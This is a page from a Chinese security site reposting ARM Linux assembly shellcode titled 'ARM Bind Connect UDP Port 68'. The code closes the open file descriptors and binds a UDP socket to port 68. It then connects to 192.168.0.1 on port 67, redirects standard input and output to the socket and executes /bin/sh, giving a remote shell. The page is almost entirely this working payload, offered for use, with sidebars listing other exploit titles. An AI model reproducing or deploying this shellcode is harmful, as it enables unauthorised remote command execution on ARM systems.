首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ARM Bind Connect UDP Port 68
来源:gmail account dgodas 作者:Daniel 发布时间:2010-10-26  

/*
 * Title: arm-bind-connect-udp
 * Brief: Bind to port 68 on any local address and plug a udp shell
 *        onto to port 67 on 192.168.0.1
 * Author: Daniel Godas-Lopez <gmail account dgodas>
 */

.if 1
 /*
   close(3), close(4), ..., close(1024)
  */

 mov %r1, $1024
1: mov %r0, %r1
 svc 0x00900006
 subs %r1, %r1, $1
 subs %r2, %r1, $3
 bpl 1b
.endif

 /*
   soc_des = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
  */

 mov %r0, $2  /* AF_INET */
 mov %r1, $2  /* SOCK_DGRAM */
 mov %r2, $17  /* IPPRTOTO_UDP */
 push {%r0, %r1, %r2}
 mov %r0, $1  /* socket */
 mov %r1, %sp
 svc 0x00900066
 add %sp, %sp, $12

 mov %r6, %r0  /* r6 = soc_des */

 /*
   bind(soc_des, (struct sockaddr*) &serv_addr, sizeof(serv_addr));
  */

.if 0 /* r0 == r6 already */
 mov %r0, %r6  /* soc_des */
.endif

 mov %r1, $0x44000000
 add %r1, $2  /* port = 68, family = 2 (AF_INET) */
 sub %r2, %r2, %r2 /* addr = 0.0.0.0 */
 push {%r1, %r2}
 mov %r1, %sp  /* pointer to sockaddr_in */
 mov %r2, $16  /* sizeof(struct sockaddr_in) */
 
 push {%r0, %r1, %r2}
 mov %r0, $2  /* bind */
 mov %r1, %sp
 svc 0x00900066
 add %sp, %sp, $20

 /*
   connect(soc_des, (struct sockaddr*) &cli_addr, sizeof(cli_addr));
  */

 mov %r0, %r6  /* soc_des */

 mov %r1, $0x43000000
 add %r1, $2  /* port = 67, family = 2 (AF_INET) */
 mov %r2, $0x1000000
 add %r2, %r2, $0xa800
 add %r2, $0xc0  /* addr = 192.168.0.1 */
 push {%r1, %r2}
 mov %r1, %sp  /* pointer to sockaddr_in */
 mov %r2, $16  /* sizeof(struct sockaddr_in) */

 push {%r0, %r1, %r2}
 mov %r0, $3  /* connect */
 mov %r1, %sp
 svc 0x00900066
 add %sp, %sp, $20

 /*
   dup2(soc_cli,0);
   dup2(soc_cli,1);
   dup2(soc_cli,2);
  */

 mov %r1, $2
1: mov %r0, %r6
 svc 0x0090003f
 subs %r1, %r1, $1
 bpl 1b

 /*
   execve("/bin/sh", parms, env);
  */

 sub %r1, %sp, $4 /* argv[0] = "sh" */
 sub %r2, %r2, %r2 /* argv[1] = 0x00000000 */
 mov %r3, $0x2f
 mov %r7, $0x62
 add %r3, %r7, lsl $8
 mov %r7, $0x69
 add %r3, %r7, lsl $16
 mov %r7, $0x6e
 add %r3, %r7, lsl $24 /* '/'  'b'  'i'  'n'  */
 mov %r4, $'/'
 mov %r7, $'s'
 add %r4, %r7, lsl $8
 mov %r7, $'h'
 add %r4, %r7, lsl $16 /* '/'  's'  'h'  0x00 */
 mov %r5, $'s'
 mov %r7, $'h'
 add %r5, %r7, lsl $8 /* 's'  'h'  0x00 0x00 */

 push {%r1, %r2, %r3, %r4, %r5}

 add %r0, %sp, $8 /* filename ptr */
 add %r1, %sp, $0 /* argv ptr */
 add %r2, %sp, $4 /* env ptr */

 svc 0x0090000b


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ARM Bindshell port 0x1337
·ARM Loader Port 0x1337
·Winamp 5.5.8.2985 (in_mod plug
·ARM ifconfig eth0 and Assign A
·Jamb CSRF Arbitrary Add a Post
·Linux Kernel 2.6.32 Local Root
·HP Data Protector Media Operat
·NitroSecurity ESM v8.4.0a Remo
·AnyDVD <= 6.7.1.0 Denial Of Se
·Apache 2.2 (Windows) Local Den
·RarmaRadio v2.52 (.m3u) Denial
·Bigace_2.7.3 CSRF Change Admin
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved